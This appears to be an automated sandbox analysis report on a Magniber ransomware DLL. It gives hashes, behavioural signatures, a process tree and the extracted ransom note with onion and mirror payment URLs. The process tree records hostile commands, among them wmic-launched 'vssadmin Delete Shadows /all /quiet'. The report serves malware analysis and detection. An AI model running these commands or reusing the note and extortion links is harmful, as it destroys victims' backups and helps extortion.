Analysis

  • max time kernel
    121s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    31-12-2023 09:17

General

  • Target

    3088d9d808dd030a756633437f351b13.dll

  • Size

    33KB

  • MD5

    3088d9d808dd030a756633437f351b13

  • SHA1

    a4e78428c7aa5f14681a313fd3f92c9267e9469a

  • SHA256

    9209b297a4d3af1a82e4a60fa45fa558f08a502ebcf5dc2fa487505fd72be331

  • SHA512

    2db4cc645b040f5e5e73d61db8342b40b5fd592ad96b5187d8513e5fd6864da6306ebc887b58df7ebf94f00aac703a3acfe30e326bd9bf7eec49a27276d75b70

  • SSDEEP

    768:JxnHytUcpkucln36De22PJNFai4OLS5wz3YKUt4fSsDZ:J0DkVV6Dh2dHrdzrbNZ

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt婍

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here: http://70fcec8880c066a01eemkyhecy.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/emkyhecy
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://70fcec8880c066a01eemkyhecy.mixedon.xyz/emkyhecy
http://70fcec8880c066a01eemkyhecy.actmake.site/emkyhecy
http://70fcec8880c066a01eemkyhecy.spiteor.space/emkyhecy
http://70fcec8880c066a01eemkyhecy.bearsat.space/emkyhecy
Note! These are temporary addresses! They will be available for a limited amount of time!

Signatures

  • Detect magniber ransomware 1 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (57) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 5 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\3088d9d808dd030a756633437f351b13.dll,#1
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1568
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt?
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:2492
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1040
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://70fcec8880c066a01eemkyhecy.mixedon.xyz/emkyhecy^&2^&42298602^&57^&311^&12"?
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:828
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://70fcec8880c066a01eemkyhecy.mixedon.xyz/emkyhecy&2&42298602&57&311&12?
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2448
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2448 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2060
  • C:\Windows\system32\CompMgmtLauncher.exe
    CompMgmtLauncher.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\system32\wbem\wmic.exe
      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
      PID:1748
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:436
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Interacts with shadow copies
    PID:2304
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2260
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:2252

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize 344B (11 entries with this path and size, each with a different hash)
  • C:\Users\Admin\AppData\Local\Temp\CabB6D4.tmp
    Filesize 65KB
  • C:\Users\Admin\AppData\Local\Temp\TarB6F6.tmp
    Filesize 171KB
  • C:\Users\Admin\Pictures\readme.txt婍
    Filesize 1KB
  • memory/1568-19-0x0000000001DB0000-0x00000000026F5000-memory.dmp
    Filesize 9.3MB